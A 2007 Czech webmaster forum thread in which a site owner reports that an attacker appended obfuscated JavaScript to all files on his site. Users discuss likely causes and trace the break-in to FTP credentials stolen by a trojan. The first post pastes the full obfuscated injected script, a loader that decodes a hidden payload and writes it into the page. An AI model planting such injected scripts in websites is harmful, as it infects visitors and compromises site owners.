Někdo mi vlezl na web

8. 9. 2007 14:41:42

Zdravím,

dneska ráno koukám na stránky, které zrovna připravuju.. a homepage nefunguje... kouknu na ftp, a tam v rootu mám ve všech souborech přidáno něco jako tohle (nekde na netu jsem na to nasel skript na unescape)

jeste okolo byly nejaky dalsi veci, ale tohle bylo to, co skodilo...

<sc ript>function RF(wj){return wj}try{var hRY='5515415n15W15x15t15i15C15V15g15w15Z15715T15O15I15F15915r15J15Y15815o15315b15z15U15R15M15y15B15P15l15a15j15N15c15X15m15k15e15S15s15G15D15615h15p15K15L15A15H15q15d14514414n14W14x14t14i14C14V14g14w14Z14714T14O14I14F14914r14J14Y14814o14314b14z14U';var xJo=RF('1'),joz=Array(21029^21125,23430^23401,5928^6103,30795^30885,25692^25769,jcL('236'),14493^14453,1267^1105,32019^32233,13626^13779,17647^17437,8030^8109,9165^9073,jcL('221'),jcL('251'),jcL('209'),jcL('180'),18230^18383,12180^12133,jcL('202'),13477^13333,2459^2415,9537^9613,jcL('181'),jcL('231'),24889^25043,7948^8177,23561^23751,27609^27405,3278^3183,24908^24999,jcL('216'),jcL('237'),18549^18599,jcL('167'),jcL('178'),13047^12863,25838^25689,jcL('164'),jcL('170'),7239^7407,4643^4751,jcL('248'),10580^10659,jcL('190'),jcL('228'),jcL('219'),jcL('207'),jcL('225'),19658^19459,jcL('187'),13874^13983,jcL('229'),jcL('213'),jcL('222'),14203^14219,jcL('223'),11010^11185,jcL('211'),26724^26837,25515^25357,jcL('189'),14706^14801,25994^25933,jcL('194'),jcL('230'),jcL('165'),jcL('193'),jcL('192'),jcL('214'),7270^7359,jcL('254'),jcL('175'),jcL('150'),jcL('246'),jcL('174'),jcL('205'),31162^30995,jcL('171'),jcL('196'),jcL('182'));var MQD,rcG;var NPy,URk='55545n5W5x5t5i5C5V5g5w5n5i5x5Z5w575T5O5I5F595r5J5Y5r585o535b575z5U5W575R5J5M5y5w595B575P5U5i595F535Y575r5l5a5y575w595B575P5U5i595F535j575r5l5a5N54595i5c5x5r595F5R5J5M5N5O595i5c5x5r595F535X5m5k5e5S5S5S5S5S535j575s5Z5n5g5r595w5i5N5n5Z5Z5G5x59575y57595r5J5X5D5y5D5X59545n5U5t595F5r585o535X5D5j59565t5x5W59545y5D5X5r5l5a5N5i5Z5h5I5c5p5i5W5x5w5O5F535j575K5z5U5W575w5a5L5y5A545H5V5P5O5U5A5j5z5U5W575q5d455y5A5H5A5Y5P5R5U5y5A5g5t5s5U5i595H5N5n445U54545x5n5i59445N5Z5W5O5A5j5z5U5W574n58595y5A4W585i5r444W5A5j5x5V5F5s5Z5n5g5r595w5i5N5n5Z5Z5G5x595N5x5w5s59564x5V5F5w5a5L5X5A5y5A5X5q5d4553575y5y4t5H535b5z5U5W575s44585y5s5Z5n5g5r595w5i5N445Z5n5U5i5x5Z5w5N585Z545i5j5z5U5W57595V4x5y575A585i5A5X5A5i5t4i5A5X5A4W4W5A5X5F575s4458574C5y575A5A4V5A5A4i5z445r5F5353575X575s44585N5W595t445U5n59575F4W4g4w5U4t4Z5S4t475N4t4T4W5Y5A5N5A535N5W595t445U5n59575F4W4O5N5X4W5Y5A5N5A535X5A5N5A5X5z445r5F53575X5A5N5A575X575P5R5U5X4n58595j5z5U5W575d5g4I5y5s5Z5n5g5r595w5i5N5n5W595U5i594F44595r595w5i5F5A5x5V5W5U5r595A535j5d5g4I5N54595i5T5i5i5W5x495g5i59575F5A545W5n5A5Y57595V4x535j5d5g4I5N58595x5O585i5y5H5j5d5g4I5N5B5x5s5i585y4r5j5d5g4I5N5V5W5U5r59455Z5W5s595W575y575S5j575i5W5q5b575s5Z5n5g5r595w5i5N495Z5s5q5N5U5t5t595w5s4n585x445s575F575d5g4I535j575T5O5I5F5w5a5L5Y575q5d4557535j5K575n5U5i5n585F5953575b5s5Z5n5g5r595w5i5N5B5W5x5i59575F5A55585i5r445C55495Z5s5q5C554W495Z5s5q5C554W585i5r445C5A535j575s5Z5n5g5r595w5i5N495Z5s5q5N5U5t5t595w5s4n585x445s575F575d5g4I535j5T5O5I575F575w5a5L5Y5q5d4553575j5K575K4J5V5g5w5n5i5x5Z5w575z445r5F535b575z5U5W575s4Y5T5y485e5j5z5U5W575p4o545y5D5S5H484r5e435k4b5m475S5U495n5s595V5D5Y494z5n5y5D5D5j575V5Z5W5F5n5t4z5y5S5j575n5t4z5755575s4Y5T5j575n5t4z5X5X5357494z5n5X5y575p4o545N545g49545i5W5F5I5U5i585N5V445Z5Z5W5F5I5U5i585N5W5U5w5s5Z5r5F534U5p4o545N44595w5O5i58535Y5H5Y5H535j575W595i5g5W5w57494z5n5j575K554W545n5W5x5t5i5C';var FIP=String();function jcL(qNP){return parseInt(qNP)}hRY=hRY.split(xJo);for (MQD=0;MQD<URk.length;MQD+=2){NPy=URk.substr(MQD,2);for(rcG=0;rcG<hRY.length;rcG++){if(hRY==NPy)break;}FIP+=String.fromCharCode(joz^156);}document.write(FIP);}catch(SNM){}</sc ript>

nechapu, jak mi mohl nekdo vlezt do rootu? co byste mi doporucili udelat, aby se to uz neopakovalo?

8. 9. 2007 14:41:42

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19140

miniJOHN

(57 hodnocení)

8. 9. 2007 14:44:46

bud php injection, neosetreni upload nebo hosting se na tebe nastval a soupl ti to tam vsude :)

8. 9. 2007 14:44:46

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19139

Muskwa

(25 hodnocení)

8. 9. 2007 14:50:29

no ja nevim, upload jsem tam jako moznost pro uzivatele nikde nemel... kdyz pominu tu variantu s hostingem :), tak asi php injection

zatim se v tomhle moc neorientuju, musim neco vygooglit :) ... tenhle kod, jeste obaleny scriptem a unescape a zrejme nejakym podpisem toho dotycneho byl uplne nakonci vsech .php a .html souboru, co byly v rootu.

to ja myslel, ze php injection muzou hodit treba jenom tam, kde je nejaky textovy pole, ne? jediny co tam mam textoveho je kontaktni formular :)

8. 9. 2007 14:50:29

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19138

Jakub Stacho

(20 hodnocení)

8. 9. 2007 15:00:06

PHP injection je založeno na tom, že nemáš ošetřené includování stránek. Nemusíš mít nikde žádné textové pole. Útočník prostě přepíše část url.

8. 9. 2007 15:00:06

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19137

Muskwa

(25 hodnocení)

8. 9. 2007 15:01:32

mám tam drupal, jediny co jsem teda delal sam, byl redirect.php podle nejakeho navodu z netu, kde mam tohle:

teď čtu o php injection - je tohle cesta, kterou by mohlo dojít k průniku?

8. 9. 2007 15:01:32

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19136

Jakub Stacho

(20 hodnocení)

8. 9. 2007 15:07:45

To nebezpečné není. Ale to, že tam máš drupal, ještě neznamená, že to nemůže být napadnutelné.

8. 9. 2007 15:07:45

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19135

Muskwa

(25 hodnocení)

8. 9. 2007 15:10:06

já vím, jenom jsem tím myslel, že to už není v mojí moci ovlivnit ...

nevíte jak by se dalo zjistit, jak se třeba mohl dostat / třeba přes jaký modul Drupalu a získat přístup? abych tomu mohl příště zabránit...

8. 9. 2007 15:10:06

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19134

toshi

(4 hodnocení)

8. 9. 2007 15:19:58

Napsal Muskwa;12674
nevíte jak by se dalo zjistit, jak se třeba mohl dostat / třeba přes jaký modul Drupalu a získat přístup? abych tomu mohl příště zabránit...

projít logy ?

8. 9. 2007 15:19:58

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19133

m@rcel

8. 9. 2007 15:38:25

používa sa na to MPack

viac info na

http://www.zive.cz/Bleskovky/Masovy-hackersky-utok-z-pohodli-konzole/sr-1-sc-4-a-136667/default.aspx

http://www.websense.com/securitylabs/alerts/alert.php?AlertID=782

8. 9. 2007 15:38:25

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19132

Muskwa

(25 hodnocení)

8. 9. 2007 17:05:40

Napsal m@rcel;12683
používa sa na to MPack

viac info na
http://www.zive.cz/Bleskovky/Masovy-hackersky-utok-z-pohodli-konzole/sr-1-sc-4-a-136667/default.aspx
a
http://www.websense.com/securitylabs/alerts/alert.php?AlertID=782

to doufám, že tohle nebylo přesně ono (co pak natahuje trojany), tohle bylo spíš něco, po čem se ta infikovaná stránka vůbec nespustila (resp. pořád byla jakoby about:blank)

na ty logy se podívám, doufám, že mi to support webhostingu pošle.

8. 9. 2007 17:05:40

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19131

Muskwa

(25 hodnocení)

8. 9. 2007 19:27:05

no tak jsem si prohlédnul FTP log, a je tam nějaké ipčko z Ruska. ale nic víc jsem z toho nezjistil, proste vypada, jako kdyby zadal uplne normalne muj login na ftp a heslo (resp. nevidim odlisnost mezi prihlasenim svym a toho hackera)

jediny, cim se to lisilo od meho prihlaseni:

JÁ:

"PASS (hidden)" 230

"PWD" 257

HACKER:

"PASS (hidden)" 230

"PASV" 227

"PWD" 257

a pak tam vytahuje a zase uklada ty soubory v rootu.

v access logu jsem zadny pristup s jeho ipckem nenasel... jedine, ze by nejak zjistil moje heslo k ftp :eek: (mam standardni heslo, co mi pridelil webhoster)

jinak teda nevim, jak se pripadne ubranit necemu podobnemu v budoucnu...

8. 9. 2007 19:27:05

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19130

Muskwa

(25 hodnocení)

8. 9. 2007 19:36:51

ja se z toho snad ....

ted koukam na web spoluzaku z gymplu, a tam byl ten hacker taky...

napada me, ze tedy musel ukrast ty hesla asi z pocitace? ze by treba z cute ftp?

8. 9. 2007 19:36:51

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19129

Muskwa

(25 hodnocení)

8. 9. 2007 20:14:01

jo...tak uz vim...

http://www.lavasoft.com/support/securitycenter/tac/tac.php?tac=Win32.TrojanPWS.LdPinch

8. 9. 2007 20:14:01

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19128

jalso

11. 9. 2007 10:21:51

prednedavnom jeden moj znamy webdesigner dopadol podobne. nejaky trojan mu slohol vsetky ftp hesla z total commandera, a prepisal weby vsetkym klientom. pricom to nebol nejaky amater 15 rocny student... skratka blamaz :)

11. 9. 2007 10:21:51

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19127

Ivan L.

11. 9. 2007 11:58:54

Jedná se skutečně nejspíš o nějakého trojana. Bohužel i jeden z mých webů byl napaden též a to i přesto, že mám na PC antivirus, AdAware i SpyBota. Chybou bylo pravděpodobně nezabezpečený přenos FTP. Ve všech souborech pojmenovaných index.* nebo default.* byl pak na FTP přidán hned za body iframe z odkazem na nějeké infikující stránky. Opravil jsem to, ale bohužel Google to zjistil rychleji a mé stránky označil jako nebezpečné. Sice je pak ve výsledcích zobrazoval, ale odkazy vedly na nějakou jeho stránku s vysvětlením, že web je nebezpečný. Nahlásil jsem pak přes Webmaster Tools, že mám web vyčištěný, ale i tak trvalo týden než byly odkazy z něj zase aktivní.

Mimochodem jedinej soft kterej byl schopen toho trojana v mém PC najít a zneškodnit byl Prevx 2.0

11. 9. 2007 11:58:54

https://webtrh.cz/diskuse/nekdo-mi-vlezl-na-web#reply19126